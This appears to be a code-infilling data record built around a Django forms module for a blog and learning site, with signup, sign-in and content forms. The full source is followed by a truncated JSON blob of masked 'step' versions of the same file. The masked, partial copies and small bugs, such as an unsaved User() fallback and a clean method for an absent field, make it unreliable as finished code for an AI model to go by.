fields = ['blog_title', 'blog_description', 'blog_keyword',
'blog_content', 'blog_pics', 'blog_publish', 'blog_datetime',
'blog_summary', 'blog_like', 'blog_added_by']
def __init__(self, *args, **kwargs):
super(TblBlogForm, self).__init__(*args, **kwargs)
self.fields['blog_datetime'].widget = forms.HiddenInput()
self.fields['blog_summary'].widget = forms.HiddenInput()
self.fields['blog_like'].widget = forms.HiddenInput()
self.fields['blog_added_by'].widget = forms.HiddenInput()
self.fields['blog_title'].widget.attrs['placeholder'] = 'Title/Topics'
self.fields['blog_description'].widget.attrs['placeholder'
] = 'Brief Description'
self.fields['blog_content'].widget.attrs['placeholder'
] = 'Blog Content'
self.fields['blog_keyword'].widget.attrs['placeholder'
] = 'Keyword For Search'
self.fields['blog_pics'].widget.attrs['placeholder'] = 'Upload Pics'
self.fields['blog_publish'].label = 'Publish'
class TblBlogCommentsForm(forms.ModelForm):
class Meta:
model = TblBlogComments
fields = '__all__'
class TblLearnDataForm(forms.ModelForm):
class Meta:
model = TblLearnData
fields = ['learn_data', 'learn_data_keyword',
'learn_data_description', 'learn_data_publish',
'learn_data_datetime', 'learn_data_added_by', 'learn_topics',
'learn_data_like', 'learn_data_icon']
def __init__(self, *args, **kwargs):
super(TblLearnDataForm, self).__init__(*args, **kwargs)
self.fields['learn_data_datetime'].widget = forms.HiddenInput()
self.fields['learn_data_added_by'].widget = forms.HiddenInput()
self.fields['learn_topics'].widget = forms.HiddenInput()
self.fields['learn_data_like'].widget = forms.HiddenInput()
self.fields['learn_data_icon'].widget = forms.HiddenInput()
self.fields['learn_data'].widget.attrs['placeholder'] = 'Title/Topics'
self.fields['learn_data_description'].widget.attrs['placeholder'
] = 'Brief Description'
self.fields['learn_data_keyword'].widget.attrs['placeholder'
] = 'Keyword For Search'
self.fields['learn_data_publish'].label = 'Publish'
class TblLearnDataCommentsForm(forms.ModelForm):
class Meta:
model = TblLearnDataComments
fields = '__all__'
class TblBlogGvpForm(forms.ModelForm):
class Meta:
model = TblBlogGvp
fields = '__all__'
class TblLearnDataGvpForm(forms.ModelForm):
class Meta:
model = TblLearnDataGvp
fields = '__all__'
class TblHomeForm(forms.ModelForm):
class Meta:
model = TblHome
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblHomeForm, self).__init__(*args, **kwargs)
self.fields['home_datetime'].widget = forms.HiddenInput()
self.fields['home_added_by'].widget = forms.HiddenInput()
self.fields['home_pics'].widget.attrs['placeholder'] = 'Upload Image'
self.fields['home_content'].widget.attrs['placeholder'] = 'Content'
self.fields['home_content_description'].widget.attrs['placeholder'
] = 'Description'
self.fields['home_publish'].label = 'Publish'
class TblAboutForm(forms.ModelForm):
class Meta:
model = TblAbout
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblAboutForm, self).__init__(*args, **kwargs)
self.fields['about_datetime'].widget = forms.HiddenInput()
self.fields['about_added_by'].widget = forms.HiddenInput()
self.fields['about_pics'].widget.attrs['placeholder'] = 'Upload Image'
self.fields['about_content'].widget.attrs['placeholder'] = 'Content'
self.fields['about_content_description'].widget.attrs['placeholder'
] = 'Description'
self.fields['about_publish'].label = 'Publish'
class TblLearnTopicsForm(forms.ModelForm):
class Meta:
model = TblLearnTopics
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblLearnTopicsForm, self).__init__(*args, **kwargs)
self.fields['learn_topics_datetime'].widget = forms.HiddenInput()
self.fields['learn_topics_icon'].widget.attrs['placeholder'] = 'Icon'
self.fields['learn_topics_coverpage_img'].widget = forms.HiddenInput()
self.fields['learn_topics'].widget.attrs['placeholder'] = 'Topics'
self.fields['learn_topics_description'].widget.attrs['placeholder'
] = 'Description'
self.fields['learn_topics_publish'].label = 'Publish'
def clean_learn_topics_added_by(self):
if not self.cleaned_data['learn_topics_added_by']:
return User()
return self.cleaned_data['learn_topics_added_by']
class TblSnippetTopicsForm(forms.ModelForm):
class Meta:
model = TblSnippetTopics
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblSnippetTopicsForm, self).__init__(*args, **kwargs)
self.fields['snippet_topics_datetime'].widget = forms.HiddenInput()
self.fields['snippet_topics_added_by'].widget = forms.HiddenInput()
self.fields['snippet_topics_icon'].widget = forms.HiddenInput()
self.fields['snippet_topics_coverpage_img'].widget = forms.HiddenInput(
)
self.fields['snippet_topics_expire'].widget = forms.HiddenInput()
self.fields['snippet_topics'].widget.attrs['placeholder'] = 'Topics'
self.fields['snippet_topics_description'].widget.attrs['placeholder'
] = 'Description'
self.fields['snippet_topics_publish'].label = 'Publish'
def clean_snippet_topics_added_by(self):
if not self.cleaned_data['snippet_topics_added_by']:
return User()
return self.cleaned_data['snippet_topics_added_by']
class TblQueriesForm(forms.ModelForm):
class Meta:
model = TblQueries
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblQueriesForm, self).__init__(*args, **kwargs)
self.fields['datetime'].widget = forms.HiddenInput()
self.fields['name'].widget.attrs['placeholder'] = 'Name'
self.fields['email'].widget.attrs['placeholder'] = 'Email'
self.fields['subject'].widget.attrs['placeholder'] = 'Subject'
self.fields['message'].widget.attrs['placeholder'] = 'Message'
<|reserved_special_token_1|>
from django import forms
from django.contrib.auth.models import User
from .models import TblPublish , TblSnippetTopics, TblSnippetData, TblLearnTopics, TblLearnData, TblBlog, TblBlogComments,TblLearnDataComments, TblBlogGvp, TblLearnDataGvp,TblSnippetDataGvp, TblHome, TblAbout, TblQueries
from django.contrib.auth.forms import UserCreationForm
class UsersigninForm(forms.Form):
username = forms.CharField(required = True, label = 'Username', max_length = 100, widget=forms.TextInput(attrs={'placeholder': 'Username'}))
password = forms.CharField(required = True, label = 'Password', max_length = 32, widget = forms.PasswordInput(attrs={'placeholder': 'Password'}))
class SignupForm(UserCreationForm):
email = forms.EmailField(max_length=200, help_text='Required')
class Meta:
model = User
fields = ('username', 'email', 'password1', 'password2')
def __init__(self, *args, **kwargs):
super(SignupForm, self).__init__(*args, **kwargs)
self.fields['username'].widget.attrs['placeholder'] = "Username"
self.fields['email'].widget.attrs['placeholder'] = "email"
self.fields['password1'].widget.attrs['placeholder'] ="password"
self.fields['password2'].widget.attrs['placeholder'] = "password Again"
class UserRegistrationForm(forms.Form):
username = forms.CharField(required = True, min_length=6,label = 'Username', max_length = 100, widget=forms.TextInput(attrs={'placeholder': 'Username'}) )
email = forms.EmailField(required = True, label = 'Email', max_length = 100, widget=forms.EmailInput(attrs={'placeholder': 'e.g. : email@gmail.com'}))
firstname = forms.CharField(required = True, label = 'First Name', max_length = 100, widget=forms.TextInput(attrs={'placeholder': 'First Name'}))
lastname = forms.CharField(required = True, label = 'Last Name', max_length = 100, widget=forms.TextInput(attrs={'placeholder': 'Last Name'}))
password = forms.CharField(required = True, label = 'Password', max_length = 100, widget = forms.PasswordInput(attrs={'placeholder': 'Password'}))
passwordagain = forms.CharField(required = True, label = 'Password (Again)', max_length = 100, widget = forms.PasswordInput(attrs={'placeholder': 'Password (Again)'}))
class TblPublishForm(forms.ModelForm):
class Meta():
model = TblPublish
fields = '__all__'
class TblSnippetDataForm(forms.ModelForm):
class Meta():
model = TblSnippetData
fields = ['snippet_topics','snippet_data_subject','snippet_data_description','snippet_data_keyword','snippet_data_code','snippet_data_datetime','snippet_data_added_by','snippet_topics','snippet_data_publish']
def clean_snippet_topics_added_by(self):
if not self.cleaned_data['snippet_topics_added_by']:
return User()
return self.cleaned_data['snippet_topics_added_by']
def __init__(self, *args, **kwargs):
super(TblSnippetDataForm, self).__init__(*args, **kwargs)
self.fields['snippet_data_datetime'].widget = forms.HiddenInput()
self.fields['snippet_data_added_by'].widget = forms.HiddenInput()
self.fields['snippet_topics'].widget = forms.HiddenInput()
self.fields['snippet_data_subject'].widget.attrs['placeholder'] = "Title/Topics"
self.fields['snippet_data_description'].widget.attrs['placeholder'] = "Brief Description"
self.fields['snippet_data_keyword'].widget.attrs['placeholder'] ="Keyword For Search"
self.fields['snippet_data_code'].widget.attrs['placeholder'] = "Snippet (Code)"
self.fields['snippet_data_publish'].widget.attrs['placeholder'] = "Ready-To-Publish"
self.fields['snippet_data_publish'].label = "Publish"
class TblBlogForm(forms.ModelForm):
class Meta():
model = TblBlog
fields = ['blog_title','blog_description','blog_keyword','blog_content','blog_pics','blog_publish','blog_datetime','blog_summary','blog_like','blog_added_by']
def __init__(self, *args, **kwargs):
super(TblBlogForm, self).__init__(*args, **kwargs)
self.fields['blog_datetime'].widget = forms.HiddenInput()
self.fields['blog_summary'].widget = forms.HiddenInput()
self.fields['blog_like'].widget = forms.HiddenInput()
self.fields['blog_added_by'].widget = forms.HiddenInput()
self.fields['blog_title'].widget.attrs['placeholder'] = "Title/Topics"
self.fields['blog_description'].widget.attrs['placeholder'] = "Brief Description"
self.fields['blog_content'].widget.attrs['placeholder'] = "Blog Content"
self.fields['blog_keyword'].widget.attrs['placeholder'] = "Keyword For Search"
self.fields['blog_pics'].widget.attrs['placeholder'] = "Upload Pics"
self.fields['blog_publish'].label = "Publish"
class TblBlogCommentsForm(forms.ModelForm):
class Meta():
model = TblBlogComments
fields = '__all__'
class TblLearnDataForm(forms.ModelForm):
class Meta():
model = TblLearnData
fields = ['learn_data','learn_data_keyword','learn_data_description','learn_data_publish','learn_data_datetime','learn_data_added_by','learn_topics','learn_data_like','learn_data_icon']
def __init__(self, *args, **kwargs):
super(TblLearnDataForm, self).__init__(*args, **kwargs)
self.fields['learn_data_datetime'].widget = forms.HiddenInput()
self.fields['learn_data_added_by'].widget = forms.HiddenInput()
self.fields['learn_topics'].widget = forms.HiddenInput()
self.fields['learn_data_like'].widget = forms.HiddenInput()
self.fields['learn_data_icon'].widget = forms.HiddenInput()
self.fields['learn_data'].widget.attrs['placeholder'] = "Title/Topics"
self.fields['learn_data_description'].widget.attrs['placeholder'] = "Brief Description"
self.fields['learn_data_keyword'].widget.attrs['placeholder'] = "Keyword For Search"
self.fields['learn_data_publish'].label = "Publish"
class TblLearnDataCommentsForm(forms.ModelForm):
class Meta():
model = TblLearnDataComments
fields = '__all__'
class TblBlogGvpForm(forms.ModelForm):
class Meta():
model = TblBlogGvp
fields = '__all__'
class TblLearnDataGvpForm(forms.ModelForm):
class Meta():
model = TblLearnDataGvp
fields = '__all__'
class TblHomeForm(forms.ModelForm):
class Meta():
model = TblHome
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblHomeForm, self).__init__(*args, **kwargs)
self.fields['home_datetime'].widget = forms.HiddenInput()
self.fields['home_added_by'].widget = forms.HiddenInput()
self.fields['home_pics'].widget.attrs['placeholder'] = "Upload Image"
self.fields['home_content'].widget.attrs['placeholder'] = "Content"
self.fields['home_content_description'].widget.attrs['placeholder'] = "Description"
self.fields['home_publish'].label = "Publish"
class TblAboutForm(forms.ModelForm):
class Meta():
model = TblAbout
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblAboutForm, self).__init__(*args, **kwargs)
self.fields['about_datetime'].widget = forms.HiddenInput()
self.fields['about_added_by'].widget = forms.HiddenInput()
self.fields['about_pics'].widget.attrs['placeholder'] = "Upload Image"
self.fields['about_content'].widget.attrs['placeholder'] = "Content"
self.fields['about_content_description'].widget.attrs['placeholder'] = "Description"
self.fields['about_publish'].label = "Publish"
class TblLearnTopicsForm(forms.ModelForm):
class Meta():
model = TblLearnTopics
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblLearnTopicsForm, self).__init__(*args, **kwargs)
self.fields['learn_topics_datetime'].widget = forms.HiddenInput()
# self.fields['learn_topics_added_by'].widget = forms.HiddenInput()
self.fields['learn_topics_icon'].widget.attrs['placeholder'] = 'Icon'
self.fields['learn_topics_coverpage_img'].widget = forms.HiddenInput()
self.fields['learn_topics'].widget.attrs['placeholder'] = "Topics"
self.fields['learn_topics_description'].widget.attrs['placeholder'] = "Description"
self.fields['learn_topics_publish'].label = "Publish"
def clean_learn_topics_added_by(self):
if not self.cleaned_data['learn_topics_added_by']:
return User()
return self.cleaned_data['learn_topics_added_by']
class TblSnippetTopicsForm(forms.ModelForm):
class Meta():
model = TblSnippetTopics
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblSnippetTopicsForm, self).__init__(*args, **kwargs)
self.fields['snippet_topics_datetime'].widget = forms.HiddenInput()
self.fields['snippet_topics_added_by'].widget = forms.HiddenInput()
self.fields['snippet_topics_icon'].widget = forms.HiddenInput()
self.fields['snippet_topics_coverpage_img'].widget = forms.HiddenInput()
self.fields['snippet_topics_expire'].widget = forms.HiddenInput()
self.fields['snippet_topics'].widget.attrs['placeholder'] = "Topics"
self.fields['snippet_topics_description'].widget.attrs['placeholder'] = "Description"
self.fields['snippet_topics_publish'].label = "Publish"
def clean_snippet_topics_added_by(self):
if not self.cleaned_data['snippet_topics_added_by']:
return User()
return self.cleaned_data['snippet_topics_added_by']
class TblQueriesForm(forms.ModelForm):
class Meta():
model = TblQueries
fields = '__all__'
def __init__(self, *args, **kwargs):
super(TblQueriesForm, self).__init__(*args, **kwargs)
self.fields['datetime'].widget = forms.HiddenInput()
self.fields['name'].widget.attrs['placeholder'] = "Name"
self.fields['email'].widget.attrs['placeholder'] = "Email"
self.fields['subject'].widget.attrs['placeholder'] = "Subject"
self.fields['message'].widget.attrs['placeholder'] = "Message"
|
flexible
|
{
"blob_id": "9e02b1a90d61de6d794dd350b50417a2f7260df6",
"index": 5947,
"step-1": "<mask token>\n\n\nclass TblBlogForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlog\n fields = ['blog_title', 'blog_description', 'blog_keyword',\n 'blog_content', 'blog_pics', 'blog_publish', 'blog_datetime',\n 'blog_summary', 'blog_like', 'blog_added_by']\n <mask token>\n\n\nclass TblBlogCommentsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlogComments\n fields = '__all__'\n\n\nclass TblLearnDataForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnData\n fields = ['learn_data', 'learn_data_keyword',\n 'learn_data_description', 'learn_data_publish',\n 'learn_data_datetime', 'learn_data_added_by', 'learn_topics',\n 'learn_data_like', 'learn_data_icon']\n\n def __init__(self, *args, **kwargs):\n super(TblLearnDataForm, self).__init__(*args, **kwargs)\n self.fields['learn_data_datetime'].widget = forms.HiddenInput()\n self.fields['learn_data_added_by'].widget = forms.HiddenInput()\n self.fields['learn_topics'].widget = forms.HiddenInput()\n self.fields['learn_data_like'].widget = forms.HiddenInput()\n self.fields['learn_data_icon'].widget = forms.HiddenInput()\n self.fields['learn_data'].widget.attrs['placeholder'] = 'Title/Topics'\n self.fields['learn_data_description'].widget.attrs['placeholder'\n ] = 'Brief Description'\n self.fields['learn_data_keyword'].widget.attrs['placeholder'\n ] = 'Keyword For Search'\n self.fields['learn_data_publish'].label = 'Publish'\n\n\nclass TblLearnDataCommentsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnDataComments\n fields = '__all__'\n\n\nclass TblBlogGvpForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlogGvp\n fields = '__all__'\n\n\nclass TblLearnDataGvpForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnDataGvp\n fields = '__all__'\n\n\nclass TblHomeForm(forms.ModelForm):\n\n\n class Meta:\n model = TblHome\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblHomeForm, self).__init__(*args, **kwargs)\n self.fields['home_datetime'].widget = forms.HiddenInput()\n self.fields['home_added_by'].widget = forms.HiddenInput()\n self.fields['home_pics'].widget.attrs['placeholder'] = 'Upload Image'\n self.fields['home_content'].widget.attrs['placeholder'] = 'Content'\n self.fields['home_content_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['home_publish'].label = 'Publish'\n\n\nclass TblAboutForm(forms.ModelForm):\n\n\n class Meta:\n model = TblAbout\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblAboutForm, self).__init__(*args, **kwargs)\n self.fields['about_datetime'].widget = forms.HiddenInput()\n self.fields['about_added_by'].widget = forms.HiddenInput()\n self.fields['about_pics'].widget.attrs['placeholder'] = 'Upload Image'\n self.fields['about_content'].widget.attrs['placeholder'] = 'Content'\n self.fields['about_content_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['about_publish'].label = 'Publish'\n\n\nclass TblLearnTopicsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnTopics\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblLearnTopicsForm, self).__init__(*args, **kwargs)\n self.fields['learn_topics_datetime'].widget = forms.HiddenInput()\n self.fields['learn_topics_icon'].widget.attrs['placeholder'] = 'Icon'\n self.fields['learn_topics_coverpage_img'].widget = forms.HiddenInput()\n self.fields['learn_topics'].widget.attrs['placeholder'] = 'Topics'\n self.fields['learn_topics_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['learn_topics_publish'].label = 'Publish'\n\n def clean_learn_topics_added_by(self):\n if not self.cleaned_data['learn_topics_added_by']:\n return User()\n return self.cleaned_data['learn_topics_added_by']\n\n\nclass TblSnippetTopicsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblSnippetTopics\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblSnippetTopicsForm, self).__init__(*args, **kwargs)\n self.fields['snippet_topics_datetime'].widget = forms.HiddenInput()\n self.fields['snippet_topics_added_by'].widget = forms.HiddenInput()\n self.fields['snippet_topics_icon'].widget = forms.HiddenInput()\n self.fields['snippet_topics_coverpage_img'].widget = forms.HiddenInput(\n )\n self.fields['snippet_topics_expire'].widget = forms.HiddenInput()\n self.fields['snippet_topics'].widget.attrs['placeholder'] = 'Topics'\n self.fields['snippet_topics_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['snippet_topics_publish'].label = 'Publish'\n\n def clean_snippet_topics_added_by(self):\n if not self.cleaned_data['snippet_topics_added_by']:\n return User()\n return self.cleaned_data['snippet_topics_added_by']\n\n\nclass TblQueriesForm(forms.ModelForm):\n\n\n class Meta:\n model = TblQueries\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblQueriesForm, self).__init__(*args, **kwargs)\n self.fields['datetime'].widget = forms.HiddenInput()\n self.fields['name'].widget.attrs['placeholder'] = 'Name'\n self.fields['email'].widget.attrs['placeholder'] = 'Email'\n self.fields['subject'].widget.attrs['placeholder'] = 'Subject'\n self.fields['message'].widget.attrs['placeholder'] = 'Message'\n",
"step-2": "<mask token>\n\n\nclass TblBlogForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlog\n fields = ['blog_title', 'blog_description', 'blog_keyword',\n 'blog_content', 'blog_pics', 'blog_publish', 'blog_datetime',\n 'blog_summary', 'blog_like', 'blog_added_by']\n\n def __init__(self, *args, **kwargs):\n super(TblBlogForm, self).__init__(*args, **kwargs)\n self.fields['blog_datetime'].widget = forms.HiddenInput()\n self.fields['blog_summary'].widget = forms.HiddenInput()\n self.fields['blog_like'].widget = forms.HiddenInput()\n self.fields['blog_added_by'].widget = forms.HiddenInput()\n self.fields['blog_title'].widget.attrs['placeholder'] = 'Title/Topics'\n self.fields['blog_description'].widget.attrs['placeholder'\n ] = 'Brief Description'\n self.fields['blog_content'].widget.attrs['placeholder'\n ] = 'Blog Content'\n self.fields['blog_keyword'].widget.attrs['placeholder'\n ] = 'Keyword For Search'\n self.fields['blog_pics'].widget.attrs['placeholder'] = 'Upload Pics'\n self.fields['blog_publish'].label = 'Publish'\n\n\nclass TblBlogCommentsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlogComments\n fields = '__all__'\n\n\nclass TblLearnDataForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnData\n fields = ['learn_data', 'learn_data_keyword',\n 'learn_data_description', 'learn_data_publish',\n 'learn_data_datetime', 'learn_data_added_by', 'learn_topics',\n 'learn_data_like', 'learn_data_icon']\n\n def __init__(self, *args, **kwargs):\n super(TblLearnDataForm, self).__init__(*args, **kwargs)\n self.fields['learn_data_datetime'].widget = forms.HiddenInput()\n self.fields['learn_data_added_by'].widget = forms.HiddenInput()\n self.fields['learn_topics'].widget = forms.HiddenInput()\n self.fields['learn_data_like'].widget = forms.HiddenInput()\n self.fields['learn_data_icon'].widget = forms.HiddenInput()\n self.fields['learn_data'].widget.attrs['placeholder'] = 'Title/Topics'\n self.fields['learn_data_description'].widget.attrs['placeholder'\n ] = 'Brief Description'\n self.fields['learn_data_keyword'].widget.attrs['placeholder'\n ] = 'Keyword For Search'\n self.fields['learn_data_publish'].label = 'Publish'\n\n\nclass TblLearnDataCommentsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnDataComments\n fields = '__all__'\n\n\nclass TblBlogGvpForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlogGvp\n fields = '__all__'\n\n\nclass TblLearnDataGvpForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnDataGvp\n fields = '__all__'\n\n\nclass TblHomeForm(forms.ModelForm):\n\n\n class Meta:\n model = TblHome\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblHomeForm, self).__init__(*args, **kwargs)\n self.fields['home_datetime'].widget = forms.HiddenInput()\n self.fields['home_added_by'].widget = forms.HiddenInput()\n self.fields['home_pics'].widget.attrs['placeholder'] = 'Upload Image'\n self.fields['home_content'].widget.attrs['placeholder'] = 'Content'\n self.fields['home_content_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['home_publish'].label = 'Publish'\n\n\nclass TblAboutForm(forms.ModelForm):\n\n\n class Meta:\n model = TblAbout\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblAboutForm, self).__init__(*args, **kwargs)\n self.fields['about_datetime'].widget = forms.HiddenInput()\n self.fields['about_added_by'].widget = forms.HiddenInput()\n self.fields['about_pics'].widget.attrs['placeholder'] = 'Upload Image'\n self.fields['about_content'].widget.attrs['placeholder'] = 'Content'\n self.fields['about_content_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['about_publish'].label = 'Publish'\n\n\nclass TblLearnTopicsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnTopics\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblLearnTopicsForm, self).__init__(*args, **kwargs)\n self.fields['learn_topics_datetime'].widget = forms.HiddenInput()\n self.fields['learn_topics_icon'].widget.attrs['placeholder'] = 'Icon'\n self.fields['learn_topics_coverpage_img'].widget = forms.HiddenInput()\n self.fields['learn_topics'].widget.attrs['placeholder'] = 'Topics'\n self.fields['learn_topics_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['learn_topics_publish'].label = 'Publish'\n\n def clean_learn_topics_added_by(self):\n if not self.cleaned_data['learn_topics_added_by']:\n return User()\n return self.cleaned_data['learn_topics_added_by']\n\n\nclass TblSnippetTopicsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblSnippetTopics\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblSnippetTopicsForm, self).__init__(*args, **kwargs)\n self.fields['snippet_topics_datetime'].widget = forms.HiddenInput()\n self.fields['snippet_topics_added_by'].widget = forms.HiddenInput()\n self.fields['snippet_topics_icon'].widget = forms.HiddenInput()\n self.fields['snippet_topics_coverpage_img'].widget = forms.HiddenInput(\n )\n self.fields['snippet_topics_expire'].widget = forms.HiddenInput()\n self.fields['snippet_topics'].widget.attrs['placeholder'] = 'Topics'\n self.fields['snippet_topics_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['snippet_topics_publish'].label = 'Publish'\n\n def clean_snippet_topics_added_by(self):\n if not self.cleaned_data['snippet_topics_added_by']:\n return User()\n return self.cleaned_data['snippet_topics_added_by']\n\n\nclass TblQueriesForm(forms.ModelForm):\n\n\n class Meta:\n model = TblQueries\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblQueriesForm, self).__init__(*args, **kwargs)\n self.fields['datetime'].widget = forms.HiddenInput()\n self.fields['name'].widget.attrs['placeholder'] = 'Name'\n self.fields['email'].widget.attrs['placeholder'] = 'Email'\n self.fields['subject'].widget.attrs['placeholder'] = 'Subject'\n self.fields['message'].widget.attrs['placeholder'] = 'Message'\n",
"step-3": "<mask token>\n\n\nclass TblSnippetDataForm(forms.ModelForm):\n\n\n class Meta:\n model = TblSnippetData\n fields = ['snippet_topics', 'snippet_data_subject',\n 'snippet_data_description', 'snippet_data_keyword',\n 'snippet_data_code', 'snippet_data_datetime',\n 'snippet_data_added_by', 'snippet_topics', 'snippet_data_publish']\n\n def clean_snippet_topics_added_by(self):\n if not self.cleaned_data['snippet_topics_added_by']:\n return User()\n return self.cleaned_data['snippet_topics_added_by']\n\n def __init__(self, *args, **kwargs):\n super(TblSnippetDataForm, self).__init__(*args, **kwargs)\n self.fields['snippet_data_datetime'].widget = forms.HiddenInput()\n self.fields['snippet_data_added_by'].widget = forms.HiddenInput()\n self.fields['snippet_topics'].widget = forms.HiddenInput()\n self.fields['snippet_data_subject'].widget.attrs['placeholder'\n ] = 'Title/Topics'\n self.fields['snippet_data_description'].widget.attrs['placeholder'\n ] = 'Brief Description'\n self.fields['snippet_data_keyword'].widget.attrs['placeholder'\n ] = 'Keyword For Search'\n self.fields['snippet_data_code'].widget.attrs['placeholder'\n ] = 'Snippet (Code)'\n self.fields['snippet_data_publish'].widget.attrs['placeholder'\n ] = 'Ready-To-Publish'\n self.fields['snippet_data_publish'].label = 'Publish'\n\n\nclass TblBlogForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlog\n fields = ['blog_title', 'blog_description', 'blog_keyword',\n 'blog_content', 'blog_pics', 'blog_publish', 'blog_datetime',\n 'blog_summary', 'blog_like', 'blog_added_by']\n\n def __init__(self, *args, **kwargs):\n super(TblBlogForm, self).__init__(*args, **kwargs)\n self.fields['blog_datetime'].widget = forms.HiddenInput()\n self.fields['blog_summary'].widget = forms.HiddenInput()\n self.fields['blog_like'].widget = forms.HiddenInput()\n self.fields['blog_added_by'].widget = forms.HiddenInput()\n self.fields['blog_title'].widget.attrs['placeholder'] = 'Title/Topics'\n self.fields['blog_description'].widget.attrs['placeholder'\n ] = 'Brief Description'\n self.fields['blog_content'].widget.attrs['placeholder'\n ] = 'Blog Content'\n self.fields['blog_keyword'].widget.attrs['placeholder'\n ] = 'Keyword For Search'\n self.fields['blog_pics'].widget.attrs['placeholder'] = 'Upload Pics'\n self.fields['blog_publish'].label = 'Publish'\n\n\nclass TblBlogCommentsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlogComments\n fields = '__all__'\n\n\nclass TblLearnDataForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnData\n fields = ['learn_data', 'learn_data_keyword',\n 'learn_data_description', 'learn_data_publish',\n 'learn_data_datetime', 'learn_data_added_by', 'learn_topics',\n 'learn_data_like', 'learn_data_icon']\n\n def __init__(self, *args, **kwargs):\n super(TblLearnDataForm, self).__init__(*args, **kwargs)\n self.fields['learn_data_datetime'].widget = forms.HiddenInput()\n self.fields['learn_data_added_by'].widget = forms.HiddenInput()\n self.fields['learn_topics'].widget = forms.HiddenInput()\n self.fields['learn_data_like'].widget = forms.HiddenInput()\n self.fields['learn_data_icon'].widget = forms.HiddenInput()\n self.fields['learn_data'].widget.attrs['placeholder'] = 'Title/Topics'\n self.fields['learn_data_description'].widget.attrs['placeholder'\n ] = 'Brief Description'\n self.fields['learn_data_keyword'].widget.attrs['placeholder'\n ] = 'Keyword For Search'\n self.fields['learn_data_publish'].label = 'Publish'\n\n\nclass TblLearnDataCommentsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnDataComments\n fields = '__all__'\n\n\nclass TblBlogGvpForm(forms.ModelForm):\n\n\n class Meta:\n model = TblBlogGvp\n fields = '__all__'\n\n\nclass TblLearnDataGvpForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnDataGvp\n fields = '__all__'\n\n\nclass TblHomeForm(forms.ModelForm):\n\n\n class Meta:\n model = TblHome\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblHomeForm, self).__init__(*args, **kwargs)\n self.fields['home_datetime'].widget = forms.HiddenInput()\n self.fields['home_added_by'].widget = forms.HiddenInput()\n self.fields['home_pics'].widget.attrs['placeholder'] = 'Upload Image'\n self.fields['home_content'].widget.attrs['placeholder'] = 'Content'\n self.fields['home_content_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['home_publish'].label = 'Publish'\n\n\nclass TblAboutForm(forms.ModelForm):\n\n\n class Meta:\n model = TblAbout\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblAboutForm, self).__init__(*args, **kwargs)\n self.fields['about_datetime'].widget = forms.HiddenInput()\n self.fields['about_added_by'].widget = forms.HiddenInput()\n self.fields['about_pics'].widget.attrs['placeholder'] = 'Upload Image'\n self.fields['about_content'].widget.attrs['placeholder'] = 'Content'\n self.fields['about_content_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['about_publish'].label = 'Publish'\n\n\nclass TblLearnTopicsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblLearnTopics\n fields = '__all__'\n\n def __init__(self, *args, **kwargs):\n super(TblLearnTopicsForm, self).__init__(*args, **kwargs)\n self.fields['learn_topics_datetime'].widget = forms.HiddenInput()\n self.fields['learn_topics_icon'].widget.attrs['placeholder'] = 'Icon'\n self.fields['learn_topics_coverpage_img'].widget = forms.HiddenInput()\n self.fields['learn_topics'].widget.attrs['placeholder'] = 'Topics'\n self.fields['learn_topics_description'].widget.attrs['placeholder'\n ] = 'Description'\n self.fields['learn_topics_publish'].label = 'Publish'\n\n def clean_learn_topics_added_by(self):\n if not self.cleaned_data['learn_topics_added_by']:\n return User()\n return self.cleaned_data['learn_topics_added_by']\n\n\nclass TblSnippetTopicsForm(forms.ModelForm):\n\n\n class Meta:\n model = TblSnippetTopics\n fields = 